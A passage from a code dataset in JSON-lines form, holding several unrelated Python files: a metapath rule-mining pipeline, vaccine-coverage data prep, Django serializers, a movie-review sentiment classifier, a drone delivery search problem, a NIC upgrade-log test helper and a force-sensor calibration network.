pairs to their metapaths\n - sample_to_weight: Dictionary mapping instances to their weights (optional)\n - algo_params: Dictionary of all framework parameters\n - sample_name: Name of the analysis sample (for caching)\n - update_cache: Boolean flag to update the cache\n - pproc: Parallel processing context\n '''\n\n metapath_dict_positive = {key: metapath_dict[key] for key in training_positives}\n\n # Pattern mining from positive instances\n pattern_to_pos_matches, t1 = FrequentMetapathSetMiner(algo_params).run(metapath_dict_positive, sample_to_weight, sample_name, pproc=pproc, update_cache=update_cache)\n pattern_to_pos_matches, t2 = MetapathPatternUnificationMiner(algo_params).run(pattern_to_pos_matches, metapath_dict_positive, sample_to_weight, sample_name, pproc=pproc, update_cache=update_cache)\n pattern_to_pos_matches, t3 = RulePruner(algo_params).prune_non_closed_itemsets(pattern_to_pos_matches)\n pattern_to_pos_matches, t4 = PathThresholdOptimiser(algo_params).run(pattern_to_pos_matches, metapath_dict_positive, sample_to_weight, sample_name, pproc=pproc, update_cache=update_cache)\n\n # Generating the set of candidate rules\n start = time.process_time()\n positive_matches_to_rule_ids = {}\n for positive_match in training_positives:\n positive_matches_to_rule_ids[positive_match] = set()\n rule_list = []\n rule_id = 1\n for pattern, pos_matches in sorted(pattern_to_pos_matches.items(), key=lambda x: x[0]):\n rule = Rule(rule_id, pattern, 1, pos_matches)\n rule_list.append(rule)\n for pos_match in pos_matches:\n positive_matches_to_rule_ids[pos_match].add(rule_id)\n rule_id += 1\n\n elapsed_time = t1+t2+t3+t4 + (time.process_time() - start)\n\n return rule_list, positive_matches_to_rule_ids, elapsed_time\n\n\ndef apply_and_prune_rules(rule_list, positive_matches_to_rule_ids, training_negatives, metapath_dict, sample_to_weight, algo_params, sample_name, update_cache=False, pproc=None):\n '''\n Utils method to apply and prune candidate metapath-based rules for the given training data.\n Parameters:\n - rule_list: List of candidate rules\n - positive_matches_to_rule_ids: Dictionary mapping positive instances to their rules\n - training_negatives: List of negative training instances (entity pairs)\n - metapath_dict: Dictionary mapping entity pairs to their metapaths\n - sample_to_weight: Dictionary mapping instances to their weights (optional)\n - algo_params: Dictionary of all framework parameters\n - sample_name: Name of the analysis sample (for caching)\n - update_cache: Boolean flag to update the cache\n - pproc: Parallel processing context\n Returns:\n - valid_rules: List of valid rules\n '''\n metapath_dict_negative = {key: metapath_dict[key] for key in training_negatives}\n negative_matches_to_rule_ids, t1 = MetapathRuleMatcher(algo_params).run(rule_list, metapath_dict_negative, sample_name, pproc=pproc, update_cache=update_cache)\n valid_rules, t2 = RulePruner(algo_params).prune_and_get_rules(rule_list, positive_matches_to_rule_ids, negative_matches_to_rule_ids, sample_to_weight)\n elapsed_time = t1+t2\n return valid_rules, elapsed_time\n\n\n\n","repo_name":"oligogenic/ARBOCK","sub_path":"arbock/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":7191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"29503505039","text":"# This script prepares the data to be used in plots showing vaccination coverage over time\n# Data is given for different dose levels, and different age groups\n# RECOVAC provides data\n# Data given for 3 age ranges - 18+, 18-59, and 60+\n# Data given for first 4 doses\n# Graph will be 'area under the curve'\nimport pandas as pd\nfrom datetime import datetime as dt\n\n# first load data.\n# 18+ age\nRECO_18plus = pd.read_excel(\n \"data/vacc_pop_18plus.xlsx\",\n sheet_name=\"Sheet1\",\n header=0,\n engine=\"openpyxl\",\n keep_default_na=False,\n)\n\n# 18-59 age\nRECO_18to59 = pd.read_excel(\n \"data/vacc_pop_18-59.xlsx\",\n sheet_name=\"Sheet1\",\n header=0,\n engine=\"openpyxl\",\n keep_default_na=False,\n)\n\n# 60+ age\nRECO_60plus = pd.read_excel(\n \"data/vacc_pop_60plus.xlsx\",\n sheet_name=\"Sheet1\",\n header=0,\n engine=\"openpyxl\",\n keep_default_na=False,\n)\n\n# function to change the date:\ndef date_func(dataset):\n dataset[[\"Year\", \"Week\"]] = (\n dataset[\"wk\"].str.split(\"w\", expand=True).astype(int)\n ) # break apart week and year\n dataset[\"day\"] = 1 # set day as Monday\n dataset.drop(dataset[(dataset[\"Year\"] == 2019)].index, inplace=True)\n dataset[\"date\"] = dataset.apply(\n lambda row: dt.fromisocalendar(row[\"Year\"], row[\"Week\"], row[\"day\"]), axis=1\n )\n pd.to_datetime(dataset[\"date\"])\n dataset.drop(columns=[\"Week\", \"Year\", \"day\", \"wk\"], axis=1, inplace=True)\n dataset[\"date\"] = dataset[\"date\"].astype(str)\n # print(dataset.head())\n\n\n# Need to do some calculations to get JUST those with 1 dose, with 2 doses.. and calc. 0 doses\n# In the original dataset e.g. one dose included anyone that had had a dose (so includes 2 dose, 3 dose..)\ndef calc_func(dataset):\n # need to work out proportions UNVACCINATED - sum rest and minus from 1\n dataset.replace(r\"^\\s*$\", 0.0, regex=True, inplace=True)\n dataset[\"no_dose\"] = (1 - dataset[\"vacc1\"]) * 100\n dataset[\"one_dose\"] = (dataset[\"vacc1\"] - dataset[\"vacc2\"]) * 100\n dataset[\"two_dose\"] = (dataset[\"vacc2\"] - dataset[\"vacc3\"]) * 100\n dataset[\"three_dose\"] = (dataset[\"vacc3\"] - dataset[\"vacc4\"]) * 100\n dataset[\"four_dose\"] = dataset[\"vacc4\"] * 100\n dataset.drop(columns=[\"vacc1\", \"vacc2\", \"vacc3\", \"vacc4\"], axis=1, inplace=True)\n # print(dataset.head())\n\n\n# make a list of datasets on which to perform the function\n\ndatasets = [RECO_18plus, RECO_18to59, RECO_60plus]\n\n# run the functions to recalculate the proportions and format the date\nfor x in datasets:\n date_func(x)\n\nfor y in datasets:\n calc_func(y)\n","repo_name":"ScilifelabDataCentre/covid-portal-visualisations","sub_path":"RECOVAC/Swedishpop_vaccinecov_dataprep.py","file_name":"Swedishpop_vaccinecov_dataprep.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"40734973267","text":"\"\"\"Bugal Utils Serializers\"\"\"\n\n# Django REST Frameworks\nfrom rest_framework import serializers\n\n# Model\nfrom bugal.base.models import (\n Country, State, Gender\n)\n\n\nclass CountryModelSerializer(serializers.ModelSerializer):\n \"\"\"Country model serializer\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n model = Country\n fields = (\n 'id',\n 'name',\n 'short_name'\n )\n\n\nclass StateModelSerializer(serializers.ModelSerializer):\n \"\"\"Country model serializer\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n model = State\n fields = (\n 'id',\n 'name',\n 'short_name'\n )\n\n\nclass GenderModelSerializer(serializers.ModelSerializer):\n \"\"\"Gender model serializer\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n model = Gender\n fields = (\n 'id',\n 'identity'\n )\n","repo_name":"aquitania99/bugal-app","sub_path":"bugal/base/utils/serializers/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"72169075751","text":"from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer, TfidfVectorizer, HashingVectorizer\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import LogisticRegression, SGDClassifier\nimport numpy as np\nimport pandas as pd\nimport re\nfrom nltk.stem.porter import PorterStemmer\nimport nltk\nfrom nltk.corpus import stopwords\nimport warnings\nimport pyprind\n\nwarnings.filterwarnings(\"ignore\") # 忽略warning\n\n\n# nltk.download(\"stopwords\")\n\n\ndef preprocessor(text):\n text = re.sub(\"<[^>]*>\", \"\", text)\n emoticons = re.findall(\"(?::|;|=)(?:-)?(?:\\)|\\(|D|P)\", text)\n text = re.sub(\"[\\W]+\", \" \", text.lower()) + \"\".join(emoticons).replace(\"-\", \"\")\n return text\n\n\ndef tokenizer(text):\n stop = stopwords.words(\"english\")\n text = re.sub(\"<[^>]*>\", \"\", text)\n emoticons = re.findall(\"(?::|;|=)(?:-)?(?:\\)|\\(|D|P)\", text)\n text = re.sub(\"[\\W]+\", \" \", text.lower()) + \"\".join(emoticons).replace(\"-\", \"\")\n tokenized = [w for w in text.split() if w not in stop]\n return tokenized\n\n\ndef stream_docs(path):\n with open(path, \"r\") as csv:\n next(csv)\n for line in csv:\n text, label = line[:-3], int(line[-2])\n yield text, label\n\n\ndef get_minibatch(doc_stream, size):\n docs, y = [], []\n try:\n for _ in range(size):\n text, label = next(doc_stream)\n docs.append(text)\n y.append(label)\n except StopIteration:\n return None, None\n return docs, y\n\n\ndef tokenizer_porter(text):\n porter = PorterStemmer()\n return [porter.stem(word) for word in text.split()]\n\n\n# pbar = pyprind.ProgBar(50000)\n# print(pbar)\n# labels = {\"pos\": 1, \"neg\": 0}\n#\n# df = pd.DataFrame()\n# for s in (\"test\", \"train\"):\n# for l in (\"pos\", \"neg\"):\n# path = \"./aclImdb/%s/%s\" % (s, l)\n# for file in os.listdir(path):\n# with open(os.path.join(path, file), \"r\") as infile:\n# txt = infile.read()\n# df = df.append([[txt, labels[l]]], ignore_index=True)\n# pbar.update()\n#\n# print(df)\n# preprocessor\n# np.random.seed(0)\n# df = df.reindex(np.random.permutation(df.index))x_train\n# df.to_csv(\"./movie_data.csv\", index=False)\n# count = CountVectorizer()\n# docs = np.array([\"The sun is shining\", \"The weather is sweet\", \"The sum is shining and the weather is sweet\"])\n# bag = count.fit_transform(docs)\n#\n# print(count.vocabulary_)\n#\n# print(bag.toarray()) # 值是出现了几次,索引是 count.vocabulary_ 的值\n#\n# tfidf = TfidfTransformer()\n# np.set_printoptions(precision=2)\n# print(tfidf.fit_transform(bag.toarray()).toarray())\n\n\ndf = pd.read_csv(\"./movie_data.csv\")\n\n# stop = stopwords.words(\"english\")\n# print([w for w in tokenizer_porter(\"a runner likes and runs a lot\")[-10:] if w not in stop])\n#\n# x_train = df.loc[:100, \"review\"].values\n# y_train = df.loc[:100, \"sentiment\"].values\n# x_test = df.loc[100:, \"review\"].values\n# y_test = df.loc[100:, \"sentiment\"].values\n# # print(x_train, y_train, x_test, y_test)\n#\n# tfidf = TfidfVectorizer(strip_accents=None, lowercase=False, preprocessor=None)\n# param_grid = [\n# {\"vect__ngram_range\": [(1, 1)], \"vect__stop_words\": [stop, None],\n# \"vect__tokenizer\": [tokenizer, tokenizer_porter], \"clf__penalty\": [\"l1\", \"l2\"],\n# \"clf__C\": [1.0, 10.0, 100.0]},\n# {\"vect__ngram_range\": [(1, 1)], \"vect__stop_words\": [stop, None],\n# \"vect__tokenizer\": [tokenizer, tokenizer_porter], \"vect__use_idf\": [False], \"vect__norm\": [None],\n# \"clf__penalty\": [\"l1\", \"l2\"], \"clf__C\": [1.0, 10.0, 100.0]}\n# ]\n# lr_tfidf = Pipeline([(\"vect\", tfidf), (\"clf\", LogisticRegression(random_state=0))])\n# gs_lr_tfidf = GridSearchCV(lr_tfidf, param_grid, scoring=\"accuracy\", cv=5, verbose=1, n_jobs=-1)\n# gs_lr_tfidf.fit(x_train, y_train)\n# print(\"Best parameter set: %s\" % gs_lr_tfidf.best_params_)\n# print(\"CV Accuracy: %.3f\" % gs_lr_tfidf.best_score_)\n# clf = gs_lr_tfidf.best_estimator_\n# print(\"Test Accuracy: %.3f\" % clf.score(x_test, y_test))\n\n\n# s = stream_docs(\"./movie_data.csv\")\n# k = 0\n# for i, j in s:\n# print(k, i, j)\n# k += 1\nvect = HashingVectorizer(decode_error=\"ignore\", n_features=2**21, preprocessor=None, tokenizer=tokenizer)\nclf = SGDClassifier(loss=\"log\", random_state=1, n_iter_no_change=1)\ndoc_stream = stream_docs(\"./movie_data.csv\")\n\npbar = pyprind.ProgBar(5)\nclasses = np.array([0, 1])\nfor _ in range(5):\n x_train, y_train = get_minibatch(doc_stream, size=1000)\n if not x_train:\n break\n x_train = vect.transform(x_train)\n clf.partial_fit(x_train, y_train, classes=classes)\n pbar.update()\n\nx_test, y_test = get_minibatch(doc_stream, size=1000)\nx_test = vect.transform(x_test)\nprint(\"Test Accuracy: %.3f\" % clf.score(x_test, y_test))\n","repo_name":"yaowenfeng1994/machine_learning_learn","sub_path":"sentiment_analysis.py","file_name":"sentiment_analysis.py","file_ext":"py","file_size_in_byte":4809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"31824326654","text":"# input: ['wish','you','a' ,'very' ,'happy', 'new','year']\n# output:['hsiw','a','yppah','raey']\n\nsen=input(\"enter a sentence \")\nl=sen.split()\nprint(l)\ni=0\nl2=[]\nwhile i list:\n result = {}\n for client, client_data in clients.items():\n for i in range(len(client_data['packages'])):\n result[client_data['packages'][i]]=client\n return result\n\n @staticmethod\n def get_manhattan_distance(source, destination):\n return abs(source[0] - destination[0]) + abs(source[1] - destination[1])\n\n def __init__(self, initial):\n \"\"\"Don't forget to implement the goal test\n You should change the initial to your own representation.\n search.Problem.__init__(self, initial) creates the root node\"\"\"\n self.map = initial[\"map\"]\n self.packages_locations = initial[\"packages\"]\n # ignore packages that are not required by any client, because we don't need to deliver\n self.needed_packages = self.get_needed_packages(initial[\"clients\"])\n self.clients = initial[\"clients\"]\n for drone, pos in initial[\"drones\"].items():\n initial[\"drones\"][drone] = [pos, []]\n #remaining_packages = list(filter(lambda package: package in self.packages_locations.keys(), self.needed_packages))\n remaining_packages=list(self.needed_packages.keys())\n client_index_in_path_dict = dict([(client_name, 0) for client_name in self.clients])\n initial = [initial[\"drones\"], remaining_packages, [], client_index_in_path_dict]\n search.Problem.__init__(self, pickle.dumps(initial))\n\n def actions(self, state):\n \"\"\"Returns all the actions that can be executed in the given\n state. The result should be a tuple (or other iterable) of actions\n as defined in the problem description file\"\"\"\n\n state = pickle.loads(state)\n clients_index_in_path_dict = state[3]\n drones_locations_and_current_packages_list_dict = state[0]\n remaining_packages = state[1]\n all_drone_actions = []\n clients_index_in_path_dict=state[3]\n for drone_name, location_and_current_packages in drones_locations_and_current_packages_list_dict.items():\n drone_location = location_and_current_packages[0]\n this_drone_actions = []\n\n # check where the drone can move\n # right\n if drone_location[1] + 1 < len(self.map[0]) and self.map[drone_location[0]][drone_location[1] + 1] == 'P':\n this_drone_actions.append((\"move\", drone_name, (drone_location[0], drone_location[1] + 1)))\n # left\n if drone_location[1] > 0 and self.map[drone_location[0]][drone_location[1] - 1] == 'P':\n this_drone_actions.append((\"move\", drone_name, (drone_location[0], drone_location[1] - 1)))\n # down\n if drone_location[0] + 1 < len(self.map) and self.map[drone_location[0] + 1][drone_location[1]] == 'P':\n this_drone_actions.append((\"move\", drone_name, (drone_location[0] + 1, drone_location[1])))\n # up\n if drone_location[0] > 0 and self.map[drone_location[0] - 1][drone_location[1]] == 'P':\n this_drone_actions.append((\"move\", drone_name, (drone_location[0] - 1, drone_location[1])))\n\n drone_packages = location_and_current_packages[1]\n # check if the drone can pick up a package\n\n if len(drone_packages) < 2:\n for package in remaining_packages:\n if self.packages_locations[package][0] == drone_location[0] \\\n and self.packages_locations[package][1] == drone_location[1]:\n this_drone_actions.append((\"pick up\", drone_name, package))\n\n # check if the drone can drop package\n if len(drone_packages)!=0:\n for i in range (len(drone_packages)):\n the_package=drone_packages[i]\n client_that_want_our_package=self.needed_packages[the_package]\n client_path = self.clients[client_that_want_our_package][\"path\"]\n client_index_in_path = clients_index_in_path_dict[client_that_want_our_package]\n client_location = client_path[client_index_in_path]\n if client_location[0] == drone_location[0] and client_location[1] == drone_location[1]:\n this_drone_actions.append((\"deliver\", drone_name, client_that_want_our_package,the_package))\n\n this_drone_actions.append((\"wait\", drone_name))\n\n all_drone_actions.append(this_drone_actions)\n\n # merge the drones actions\n # need to remove actions where two different drones pick same package\n merged_actions = list(itertools.product(*all_drone_actions))\n merged_actions = list(filter(self.is_legal_action, merged_actions))\n #merged_actions = list(tuple(action) for action in merged_actions)\n return merged_actions\n\n \"\"\"\n verifies that the action is legal\n this means that 2 drones can't pick up the same package\n \"\"\"\n @staticmethod\n def is_legal_action(action):\n for i in range(len(action)):\n if action[i][0] == \"pick up\":\n for j in range(i + 1, len(action)):\n if action[j][0] == \"pick up\" and action[i][2] == action[j][2]:\n return False\n return True\n\n def result(self, state, action):\n \"\"\"Return the state that results from executing the given\n action in the given state. The action must be one of\n self.actions(state).\"\"\"\n state = pickle.loads(state)\n clients_index_in_path_dict = state[3]\n drones_locations_and_current_list_dict = state[0]\n remaining_packages = state[1]\n dropped_packages = state[2]\n\n # apply action for all drones\n for drone_action in action:\n if drone_action[0] == \"move\":\n drone_to_move = drone_action[1]\n drone_new_location = drone_action[2]\n drones_locations_and_current_list_dict[drone_to_move][0] = drone_new_location\n if drone_action[0] == \"pick up\":\n drone_that_picks = drone_action[1]\n package_to_pick = drone_action[2]\n remaining_packages.remove(package_to_pick)\n drones_locations_and_current_list_dict[drone_that_picks][1].append(package_to_pick)\n if drone_action[0] == \"deliver\":\n drone_that_delivers = drone_action[1]\n package_to_deliver = drone_action[3]\n drones_locations_and_current_list_dict[drone_that_delivers][1].remove(package_to_deliver)\n dropped_packages.append(package_to_deliver)\n # add the package to the delivered packages after it is added\n if drone_action[0] == \"wait\":\n pass\n\n # move the clients\n for client_name in self.clients:\n client_path_len = len(self.clients[client_name][\"path\"])\n clients_index_in_path_dict[client_name] += 1\n clients_index_in_path_dict[client_name] = clients_index_in_path_dict[client_name] % client_path_len\n state = [drones_locations_and_current_list_dict, remaining_packages, dropped_packages, clients_index_in_path_dict]\n return pickle.dumps(state)\n\n def goal_test(self, state):\n \"\"\" Given a state, checks if this is the goal state.\n Returns True if it is, False otherwise.\"\"\"\n state = pickle.loads(state)\n dropped_packages = state[2]\n if len(self.needed_packages) == len(dropped_packages):\n return True\n return False\n\n def h(self, node):\n \"\"\" This is the heuristic. It gets a node (not a state,\n state can be accessed via node.state)\n and returns a goal distance estimate\"\"\"\n\n if self.goal_test(node.state):\n return 0\n state = pickle.loads(node.state)\n remaining_package = state[1]\n remaining_packages=copy.copy(remaining_package)\n drone_locations_and_current_packages_dict = state[0]\n all_h = []\n score=0\n for drone_name, location_and_current_packages in drone_locations_and_current_packages_dict.items():\n num_of_packages = len(location_and_current_packages[1])\n if num_of_packages == 2:\n dis,pak=self.get_distance_from_closest_client(location_and_current_packages[0], location_and_current_packages[1], state)\n all_h.append(dis)\n score+=1\n\n\n # can't drop packages, try to get closer to the closest package\n if num_of_packages == 0:\n if len(remaining_packages)>0:\n dis,pak=self.get_distance_from_closest_package_for_2(location_and_current_packages[0], remaining_packages, state)\n all_h.append(dis)\n remaining_packages.remove(pak)\n else:\n all_h.append(0)\n if num_of_packages == 1:\n if len(remaining_packages)>0:\n dis,pak= self.get_distance_from_closest_package_for_2(location_and_current_packages[0], remaining_packages,state)\n dis2,pak2= self.get_distance_from_closest_client(location_and_current_packages[0], location_and_current_packages[1], state)\n all_h.append(min(dis,dis2))\n if dis < dis2:\n remaining_packages.remove(pak)\n else:\n dis2, pak2 = self.get_distance_from_closest_client(location_and_current_packages[0],\n location_and_current_packages[1], state)\n all_h.append(dis2)\n\n\n\n\n dropped_packages = state[2]\n all_h = list(filter(lambda x: x is not None, all_h))\n if not all_h:\n # check for cases that all_h didn't have values that are not None, can happen in unsolvable problems\n all_h.append(1)\n max_dist = max(all_h)\n avg_dist = sum(all_h) / len(all_h)+ 1\n res = node.depth + len(set(self.needed_packages) - set(dropped_packages)) * avg_dist + len(\n remaining_packages) * avg_dist + max_dist\n\n return res\n\n\n def get_distance_from_closest_client(self, location, current_packages,state):\n clients_index_in_path_dict = state[3]\n distances_from_clients = []\n for i in range(len(current_packages)):\n clients_that_want_one_of_our_packages = self.needed_packages[current_packages[i]]\n client_path = self.clients[clients_that_want_one_of_our_packages][\"path\"]\n client_path_len=len(client_path)\n client_index_in_path = clients_index_in_path_dict[clients_that_want_one_of_our_packages]+1\n client_location = client_path[(client_index_in_path) % client_path_len]\n distances_from_client = self.get_manhattan_distance(location,client_location)\n distances_from_clients.append(distances_from_client)\n return min(distances_from_clients),0\n\n def get_distance_from_closest_package_for_2(self, location, packages,state):\n if not packages:\n return 0,0\n\n\n min=1000000000\n for package in packages:\n distances_from_packages=self.get_manhattan_distance(location, self.packages_locations[package])\n client_that_want_one_of_our_packages = self.needed_packages[package]\n client_path = self.clients[client_that_want_one_of_our_packages][\"path\"]\n client_path_len = len(client_path)\n client_index_in_path = state[3][client_that_want_one_of_our_packages]\n client_location = client_path[(client_index_in_path) % client_path_len]\n dist_from_client=self.get_manhattan_distance(self.packages_locations[package], client_location)\n dist = distances_from_packages+dist_from_client\n if dist < min:\n min=dist\n package_deliverd=package\n\n\n\n return min,package_deliverd\n \"\"\"Feel free to add your own functions\n (-2, -2, None) means there was a timeout\"\"\"\n\n\ndef create_drone_problem(game):\n return DroneProblem(game)\n","repo_name":"ShenhavOfir/DroneProblem","sub_path":"ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":12479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"35713154750","text":"#! /usr/bin/python3\nimport os\nimport datetime\nimport re\nimport iota.harness.api as api\n\n__upg_log_path = \"/obfl/upgrade.log\"\n__upg_log_fname = \"upgrade.log\"\n__ERROR = \"E\"\n\ndef __find_err_in_upg_log(node, records):\n found_error = False\n\n for r in records:\n if r['lvl'] == __ERROR:\n api.Logger.error(f\"Found error message in upg log on {node}: {r['raw']}\")\n found_error = True\n return api.types.status.FAILURE if found_error else api.types.status.SUCCESS\n\ndef __is_record_type_state(record):\n return True if record and \"MoveStateMachine\" in record['fname'] else False\n\ndef __get_upg_log_fname_from_node(node, log_dir):\n return f\"{log_dir}/upgrade_{node}.log\"\n\ndef __get_datetime_from_record(record):\n if record:\n return datetime.datetime.strptime(record['ts'],\"%Y-%m-%d %H:%M:%S.%f+00:00\")\n return ts\n\ndef __disset_upg_log(node, logs):\n records = []\n\n for log in logs:\n r_exp = r\"(?P[I,D,E]) \\[(?P.*)\\] \\((?P.*)\\) \\[(?P.*)\\] (?P.*)\"\n m = re.search(r_exp, log)\n if m:\n records.append({e: m.group(e) for e in [\"lvl\", \"ts\", \"tid\", \"fname\", \"msg\"]})\n records[-1][\"raw\"] = log\n else:\n api.Logger.error(f\"Failed to dissect log on {node} : {log}\")\n return records\n\ndef __calculate_upg_state_duration(node, records):\n last_ts = None\n\n for r in reversed(records):\n if not __is_record_type_state(r):\n continue\n if last_ts == None:\n last_ts = __get_datetime_from_record(r)\n r['duration'] = 0\n else:\n r['duration'] = last_ts - __get_datetime_from_record(r)\n last_ts = __get_datetime_from_record(r)\n\ndef __dump_upg_log(node, logs):\n api.Logger.SetNode(node)\n indent = \"-\" * 25\n api.Logger.info(f\"{indent} U P G R A D E L O G S {indent}\")\n for log in logs:\n api.Logger.info(log)\n api.Logger.SetNode(None)\n\ndef __display_upg_state_transition(node, records):\n __calculate_upg_state_duration(node, records)\n api.Logger.SetNode(node)\n indent = \"-\" * 25\n api.Logger.info(\"\\n\")\n api.Logger.info(f\"{indent} U P G R A D E S T A T E T R A N S I T I O N {indent}\")\n for r in records:\n if __is_record_type_state(r):\n api.Logger.info(\"- {} {:<45} {}\".format(r['ts'], r['msg'], r['duration']))\n api.Logger.info(\"Total Time : %s\\n\\n\"%(__get_datetime_from_record(records[-1]) - \\\n __get_datetime_from_record(records[1])))\n api.Logger.SetNode(None)\n\ndef ResetUpgLog(nodes):\n nodes = nodes if nodes else api.GetNaplesWorkloads()\n req = api.Trigger_CreateExecuteCommandsRequest(serial=False)\n\n for node in nodes:\n cmd = f\":>{__upg_log_path}\"\n api.Trigger_AddNaplesCommand(req, node, cmd)\n\n resp = api.Trigger(req)\n for cmd in resp.commands:\n api.PrintCommandResults(cmd)\n if cmd.exit_code != 0:\n api.Logger.error(f\"Failed to reset upgrade log on {cmd.node_name}\")\n return api.types.status.FAILURE\n return api.types.status.SUCCESS\n\ndef __dhcp_oob_mnic0(nodes):\n nodes = nodes if nodes else api.GetNaplesWorkloads()\n dhclient_cmd = \"dhclient oob_mnic0\"\n req = api.Trigger_CreateExecuteCommandsRequest(serial=False)\n\n for node in nodes:\n api.Trigger_AddNaplesCommand(req, node, dhclient_cmd)\n\n resp = api.Trigger(req)\n for cmd in resp.commands:\n api.PrintCommandResults(cmd)\n if cmd.exit_code != 0:\n api.Logger.error(f\"Failed to run dhclient on {cmd.node_name}\")\n return api.types.status.FAILURE\n return api.types.status.SUCCESS\n\ndef GetUpgLog(nodes, log_dir):\n nodes = nodes if nodes else api.GetNaplesWorkloads()\n file_name = f\"{log_dir}/{__upg_log_fname}\"\n for node in nodes:\n if __dhcp_oob_mnic0([node]) != api.types.status.SUCCESS:\n return api.types.status.FAILURE\n api.CopyFromNaples(node, [__upg_log_path], log_dir, via_oob=True)\n if os.path.exists(file_name):\n os.rename(file_name, __get_upg_log_fname_from_node(node, log_dir))\n else:\n api.Logger.error(f\"Upgrade logs for {node} not found @ {file_name}\")\n return api.types.status.FAILURE\n return api.types.status.SUCCESS\n\ndef VerifyUpgLog(nodes, log_dir):\n for node in nodes:\n if GetUpgLog([node], log_dir) != api.types.status.SUCCESS:\n api.Logger.error(f\"Failed to get the upgrade log for {node}\")\n return api.types.status.FAILURE\n\n with open(__get_upg_log_fname_from_node(node, log_dir)) as f:\n logs = f.readlines()\n if not logs:\n api.Logger.error(f\"Failed to read logs from {node}\")\n return api.types.status.FAILURE\n __dump_upg_log(node, logs)\n\n records = __disset_upg_log(node, logs)\n if not records:\n api.Logger.error(f\"Failed to dissect the upgrade logs from {node}\")\n return api.types.status.FAILURE\n\n if __find_err_in_upg_log(node, records) != api.types.status.SUCCESS:\n return api.types.status.FAILURE\n\n __display_upg_state_transition(node, records)\n\n return api.types.status.SUCCESS\n","repo_name":"ccdxc/sw","sub_path":"iota/test/iris/testcases/naples_upgrade/upgrade_utils.py","file_name":"upgrade_utils.py","file_ext":"py","file_size_in_byte":5276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"70089195751","text":"import torch\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.utils.data as Data\n\nimport matplotlib.pyplot as plt\n#matplotlib inline\n\nimport numpy as np\nimport imageio\nfrom numpy import genfromtxt\n\n\n# settings\nTRAIN = True\n\n# read the training data\nrepo = 'ingripper calibration/fast - 5 cycles - pi_3/'\n#repo = 'ingripper calibration/fast - 5 cycles - pi_3/'\nati = np.genfromtxt(repo + 'atiData.txt', delimiter=' ',dtype=float)\ndiffsig = np.genfromtxt(repo + 'diffData.txt', delimiter=' ',dtype=float)\nsumsig = np.genfromtxt(repo + 'sumData.txt', delimiter=' ',dtype=float)\npos = np.genfromtxt(repo + 'posData.txt', delimiter=' ',dtype=float)\nvel = np.genfromtxt(repo + 'velData.txt', delimiter=' ',dtype=float)\neff = np.genfromtxt(repo + 'effData.txt', delimiter=' ',dtype=float)\n#temp = np.genfromtxt(repo + 'tempData.txt', delimiter=' ',dtype=float)\n#temp = temp[:,np.newaxis]\n\n# build the feature vector\ndiffsig = diffsig-np.mean(diffsig[0:500,:],axis = 0)\nati = ati-np.mean(ati[0:500,:],axis = 0)\nNsig = diffsig/sumsig\nNsig = np.hstack((Nsig,Nsig**2))\n\nx = np.hstack((Nsig,pos,vel,eff));\nmean_x = np.mean(x,axis=0)\nstddev_x = np.std(x,axis=0)\nx = (x-mean_x)/stddev_x\nmax_ati = np.max(np.abs(ati),axis=0);\ny = ati/max_ati\n\nxss = x[0:x.shape[0]:50,:]\nyss = y[0:y.shape[0]:50,:]\n\n# split data to training and test sets\ndataSize = xss.shape[0]\ntrainSize = int(np.floor(0.7*dataSize))\ntestSize = dataSize-trainSize\ntrainIndex,testIndex = torch.utils.data.random_split(range(dataSize), [trainSize, testSize], generator=torch.Generator().manual_seed(2020))\n\nxTrain = xss[trainIndex,:]\nyTrain = yss[trainIndex,:]\nxTest = xss[testIndex,:]\nyTest = yss[testIndex,:]\n\n# this is one way to define a network\nclass Net(torch.nn.Module):\n def __init__(self, n_feature, n_hidden, n_output):\n super(Net, self).__init__()\n self.hidden1 = torch.nn.Linear(n_feature, n_hidden[0]) # hidden layer\n self.hidden2 = torch.nn.Linear(n_hidden[0], n_hidden[1]) # hidden layer\n #self.hidden3 = torch.nn.Linear(n_hidden[1], n_hidden[2]) # hidden layer\n self.predict = torch.nn.Linear(n_hidden[1], n_output) # output layer\n # Define proportion or neurons to dropout\n self.dropout = torch.nn.Dropout(0.8)\n def forward(self, x):\n x = torch.sigmoid(self.hidden1(x)) # activation function for hidden layer\n x = torch.sigmoid(self.hidden2(x)) # activation function for hidden layer\n #x = self.dropout(x)\n #x = self.dropout(x)\n #x = torch.sigmoid(self.hidden3(x)) # activation function for hidden layer\n #x = self.dropout(x)\n out = self.predict(x) # linear output\n return out\n\n# model architecture\nhlayers = [30,10]\nnfeatures = np.shape(xTrain)[1]\nnoutput = np.shape(yTrain)[1]\nArch = '_30_10'\n\nif TRAIN:\n\t# torch can only train on Variable, so convert them to Variable\n xTrain = Variable(torch.from_numpy(xTrain))\n yTrain = Variable(torch.from_numpy(yTrain))\n \n # Check cuda availability\n cuda = torch.cuda.is_available()\n \n # Create neural network model\n if cuda:\n torch.cuda.manual_seed(2020)\n model = Net(n_feature = nfeatures, n_hidden = hlayers, n_output = noutput).cuda()\n device = 'cuda'\n else:\n torch.manual_seed(2020)\n model = Net(n_feature = nfeatures, n_hidden = hlayers, n_output = noutput)\n device = 'cpu'\n\n optimizer = torch.optim.LBFGS(model.parameters())\n loss_func = torch.nn.MSELoss() # this is for regression mean squared loss\n \n model = model.double()\n 